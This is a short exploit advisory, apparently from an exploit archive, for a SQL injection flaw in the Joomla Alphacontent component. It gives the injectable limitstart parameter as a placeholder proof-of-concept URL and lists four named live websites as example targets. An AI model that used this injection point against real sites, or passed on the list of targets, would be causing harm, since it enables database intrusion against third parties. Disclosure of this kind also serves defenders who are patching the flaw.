The Joomla Alphacontent component suffers from a remote SQL injection vulnerability.
28b21ee58f3aee48c851f43f65980c93050683b261472e7aaf6d9ebe6072a792
##################################################
# Exploit Title: joomla component (com_alphacontent) SQL injection Vulnerability
#Vendor: http://extensions.joomla.org/extensions/directory-a-documentation/directory/5023
# Date: 22/04/2012
# Author: xDarkSton3x
# E-mail : xdarkston3x@msn.com
# Category:: webapps
# Example Sites :
http://www.camaraconstruccionquito.ec/index.php?option=com_alphacontent§ion=15&Itemid=1&lang=es&limitstart=1240
http://www.mundoquimeras.com/index.php?option=com_alphacontent§ion=35&Itemid=94&lang=en&limitstart=10
http://www.masmallorca.de/index.php?option=com_alphacontent§ion=weblinks&Itemid=1&lang=de&limitstart=72
http://www.magenta.gr/index.php?option=com_alphacontent&Itemid=1&lang=en§ion=3&limitstart=10
# Tested on: linux + windows
##################################################
[~]Exploit/p0c :
http://www.site.com/index.php?option=com_alphacontent§ion=weblinks&Itemid=1&lang=de&limitstart=[sqli]
Greetz: [ Insecurity Peru ] - [ Rs4 - B4nz0k - FailSoft - W4rn1ng - Dedalo - Maztor ]